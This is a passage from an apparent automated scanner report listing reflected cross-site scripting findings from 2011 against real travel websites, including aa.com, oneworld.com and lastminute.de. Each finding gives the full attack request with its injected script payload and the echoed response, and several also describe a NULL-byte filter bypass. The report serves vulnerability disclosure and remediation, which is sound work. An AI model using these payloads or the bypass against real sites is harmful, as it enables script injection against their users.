User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="fcddd"><img src=a onerror=alert(1)>3e7e2603db8" />
...[SNIP]...

1.99. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorLocation parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the anchorLocation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0094275"><img%20src%3da%20onerror%3dalert(1)>94b72a5c254 was submitted in the anchorLocation parameter. This input was echoed as 94275"><img src=a onerror=alert(1)>94b72a5c254 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /reservation/roundTripSearchAccess.do?anchorLocation=Shopping+Links+%28Reservations+Home%29%0094275"><img%20src%3da%20onerror%3dalert(1)>94b72a5c254&url=%2Freservation%2FroundTripSearchAccess.do&_locale=en_US&reportedTitle=Flights HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191605


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorLocation" value="Shopping Links (Reservations Home).94275"><img src=a onerror=alert(1)>94b72a5c254" />
...[SNIP]...

1.100. https://www.aa.com/reservation/roundTripSearchAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5985"><img%20src%3da%20onerror%3dalert(1)>8c370d56eff was submitted in the from parameter. This input was echoed as c5985"><img src=a onerror=alert(1)>8c370d56eff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/roundTripSearchAccess.do?anchorEvent=false&from=Navc5985"><img%20src%3da%20onerror%3dalert(1)>8c370d56eff HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Navc5985"><img src=a onerror=alert(1)>8c370d56eff" />
...[SNIP]...

1.101. https://www.aa.com/reservation/roundTripSearchAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d5c6"><x%20style%3dx%3aexpr/**/ession(alert(1))>2cfcc62f0b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d5c6"><x style=x:expr/**/ession(alert(1))>2cfcc62f0b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /reservation/roundTripSearchAccess.do?%006d5c6"><x%20style%3dx%3aexpr/**/ession(alert(1))>2cfcc62f0b9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name=".6d5c6"><x style=x:expr/**/ession(alert(1))>2cfcc62f0b9" value="1" />
...[SNIP]...

1.102. https://www.aa.com/reservation/roundTripSearchAccess.do [promoCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the promoCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da7e"><x%20style%3dx%3aexpression(alert(1))>ec09264a494 was submitted in the promoCode parameter. This input was echoed as 3da7e"><x style=x:expression(alert(1))>ec09264a494 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/roundTripSearchAccess.do?promoCode=3da7e"><x%20style%3dx%3aexpression(alert(1))>ec09264a494 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="promoCode" value="3da7e"><x style=x:expression(alert(1))>ec09264a494" />
...[SNIP]...

1.103. https://www.aa.com/reservation/roundTripSearchAccess.do [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4af"><img%20src%3da%20onerror%3dalert(1)>5f6ad6b07bf was submitted in the url parameter. This input was echoed as 7f4af"><img src=a onerror=alert(1)>5f6ad6b07bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/roundTripSearchAccess.do?anchorLocation=Shopping+Links+%28Reservations+Home%29&url=%2Freservation%2FroundTripSearchAccess.do7f4af"><img%20src%3da%20onerror%3dalert(1)>5f6ad6b07bf&_locale=en_US&reportedTitle=Flights HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191549


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="url" value="/reservation/roundTripSearchAccess.do7f4af"><img src=a onerror=alert(1)>5f6ad6b07bf" />
...[SNIP]...

1.104. https://www.aa.com/reservation/searchFlightsSubmit.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/searchFlightsSubmit.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18b5"><img%20src%3da%20onerror%3dalert(1)>e27521e3318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b18b5"><img src=a onerror=alert(1)>e27521e3318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/searchFlightsSubmit.do?b18b5"><img%20src%3da%20onerror%3dalert(1)>e27521e3318=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191383


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="b18b5"><img src=a onerror=alert(1)>e27521e3318" value="1" />
...[SNIP]...

1.105. https://www.aa.com/seatmap/viewSeatsAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /seatmap/viewSeatsAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b91f"><img%20src%3da%20onerror%3dalert(1)>c9e6f8211c was submitted in the from parameter. This input was echoed as 7b91f"><img src=a onerror=alert(1)>c9e6f8211c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /seatmap/viewSeatsAccess.do?from=Nav7b91f"><img%20src%3da%20onerror%3dalert(1)>c9e6f8211c HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Nav7b91f"><img src=a onerror=alert(1)>c9e6f8211c" />
...[SNIP]...

1.106. https://www.aa.com/seatmap/viewSeatsAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /seatmap/viewSeatsAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a437a"><img%20src%3da%20onerror%3dalert(1)>02f54b75a31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a437a"><img src=a onerror=alert(1)>02f54b75a31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /seatmap/viewSeatsAccess.do?a437a"><img%20src%3da%20onerror%3dalert(1)>02f54b75a31=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="a437a"><img src=a onerror=alert(1)>02f54b75a31" value="1" />
...[SNIP]...

1.107. https://www.aa.com/utilities/BookCar.jsp [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /utilities/BookCar.jsp

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 138de'%3balert(1)//29072404f0e was submitted in the src parameter. This input was echoed as 138de';alert(1)//29072404f0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /utilities/BookCar.jsp?src=AATABCAR138de'%3balert(1)//29072404f0e&anchorLocation=Shopping+Links+%28Reservations+Home%29&url=%2Futilities%2FBookCar.jsp&_locale=en_US&reportedTitle=Car HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:32 GMT
Content-Length: 728
Connection: close


<html>
   <body>
   </body>
</html>

<script>
submitCarForm('http://ach1.aavacations.com/car/redircar.asp?src=AATABCAR138de';alert(1)//29072404f0e','');
function submitCarForm(url,aadvNumber) {
carForm = document.getElementById('carForm');
   if (carForm) {
       document.body.removeChild(carForm);
   }
   carForm = document.createElement("form");    
   docum
...[SNIP]...

1.108. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20cf4"style%3d"x%3aexpression(alert(1))"434f099edb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20cf4"style="x:expression(alert(1))"434f099edb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?20cf4"style%3d"x%3aexpression(alert(1))"434f099edb9=1 HTTP/1.1
Host: www.igougo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-SL-CompState: Recompiling
Set-Cookie: ASP.NET_SessionId=ccardw55zfvot555qy3kc320; path=/; HttpOnly
Set-Cookie: UUIDCookie=133422248f294fccb724dc811804a4a3; expires=Mon, 12-Nov-2012 00:01:18 GMT; path=/; HttpOnly
Set-Cookie: SL_Audience=707|Accelerated|772|12|0;Expires=Tue, 12-Nov-13 13:48:25 GMT;Path=/;Domain=.igougo.com
Set-Cookie: SL_UVId=2BE3057CA640E94E;path=/;
Set-Cookie: SL_NV12=1|12;Expires=Tue, 15-Nov-11 01:48:25 GMT;Path=/;Domain=.igougo.com
Cache-Control: private
Date: Sun, 13 Nov 2011 13:50:58 GMT
Connection: close
X-Strangeloop: ViewState
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Content-Length: 201059


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><script id="slheadjs" type="text/javascript" err="true">
...[SNIP]...
<base href="http://www.igougo.com/Default.aspx?20cf4"style="x:expression(alert(1))"434f099edb9=1" />
...[SNIP]...

1.109. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 26f8a-->d32a6401dae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE26f8a-->d32a6401dae/lmn2/travel/kombi/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:41 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=D34A6F8E292B5D6D423A284B6F2233A6; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 42309


<script language="JavaScript" type="text/javascript">
var pageLoadStart = new Date().getTime();
</script>


<!-- START ID :: page -->
<div id="page" class="page">

<div id="heade
...[SNIP]...
<!-- /de_DE26f8a-->d32a6401dae/lmn2/travel/kombi/fh/htmlmodule0.xml -->
...[SNIP]...

1.110. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ac692-->96adbea124a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travelac692-->96adbea124a/kombi/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:55 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=4FAD60E7D27AB04B536ED46CE6A2022D; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>lastminute.de
...[SNIP]...
<!-- /de_DE/lmn2/travelac692-->96adbea124a/kombi/fh/htmlmodule4.xml -->
...[SNIP]...

1.111. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload d8bf7-->b3102df32bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travel/kombid8bf7-->b3102df32bf/fh/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:49:03 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=4489FFF2F7B16670F250D6BE303426F5; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 47449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>lastminute.de
...[SNIP]...
<!-- /de_DE/lmn2/travel/kombid8bf7-->b3102df32bf/fh/htmlmodule4.xml -->
...[SNIP]...

1.112. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lastminute.de
Path:   /de_DE/lmn2/travel/kombi/fh/new.do

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7fbc5-->82dff0268fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /de_DE/lmn2/travel/kombi/fh7fbc5-->82dff0268fc/new.do HTTP/1.1
Host: www.lastminute.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:49:18 GMT
Server: Apache/2.2
Set-Cookie: JSESSIONID=E887CCDC3863FA0E275BE6B689BED985; Path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 52848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Flug und Hot
...[SNIP]...
<!-- /de_DE/lmn2/travel/kombi/fh7fbc5-->82dff0268fc/htmlmodule4.xml -->
...[SNIP]...

1.113. http://www.oneworld.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oneworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c44f"><script>alert(1)</script>c6d9a582c96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1c44f"><script>alert(1)</script>c6d9a582c96=1 HTTP/1.1
Host: www.oneworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:48:56 GMT
Server: Microsoft-IIS/6.0
ow: web1
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=3630f9fbd90e7feb486b4265f686d3e53155;domain=.oneworld.com;path=/
expires: -1
Content-Type: text/html; charset=utf-8
cache-control: no-cache
cache-control: no-cache, must-revalidate
pragma: no-cache
Last-Modified: Sun, 13 Nov 2011 13:48:56 GMT
Content-Language: en-AU

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a mpdisnav mporgnav href="http://www.oneworld.com/?1c44f"><script>alert(1)</script>c6d9a582c96=1&languageCode=en" onclick="return SwitchLanguage('en'); function SwitchLanguage(lang) {
MP.SrcUrl=unescape('mp_js_orgin_url');
   MP.UrlLang='mp_js_current_lang';
   MP.init();
   MP.switchLanguage
...[SNIP]...

1.114. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload edeff'><script>alert(1)</script>02e3f611d22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?edeff'><script>alert(1)</script>02e3f611d22=1 HTTP/1.1
Host: www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:48:37 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=7442D988491ECF2828BB20639A3017F0; Path=/
Set-Cookie: SESSIONID=-1212152019; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_7_4-1.262-cellNum_2; Domain=.pronto.com; Expires=Tue, 13-Dec-2011 13:48:37 GMT; Path=/
Set-Cookie: entryPoint=direct; Domain=.pronto.com; Path=/
Set-Cookie: M_ID=5ad6b0bc-1339d24b9ca--20e9; Domain=.pronto.com; Expires=Tue, 12-Nov-2013 13:48:37 GMT; Path=/
Set-Cookie: V_ID=5ad6b0bc-1339d24b9ca--20e8; Domain=.pronto.com; Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
_eep-Alive: timeout=15
_onnection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Via: CN-5000
Connection: close
Content-Length: 116237


            <!DOCTYPE html
PUBLIC "-//W3C//DTD
...[SNIP]...
<meta content='http://www.pronto.com/?edeff'><script>alert(1)</script>02e3f611d22=1' property='og:url'/>
...[SNIP]...

1.115. http://www.reisefeber.no/no/package_tours [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reisefeber.no
Path:   /no/package_tours

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9b1"><script>alert(1)</script>01edd94456d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /no8e9b1"><script>alert(1)</script>01edd94456d/package_tours HTTP/1.1
Host: www.reisefeber.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 13:49:24 GMT
Server: tn3 Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- template = error/page_has_expired.html -->
<html>
<head>
<title>Reisefeber - Gode reisetilbud er ferskvare</title>
<META http-e
...[SNIP]...
<input type="hidden" name="last_name" value="/no8e9b1"><script>alert(1)</script>01edd94456d/package_tours">
...[SNIP]...

1.116. http://www.reisefeber.no/no/package_tours [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reisefeber.no
Path:   /no/package_tours

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda4a"><script>alert(1)</script>316ba34c109 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

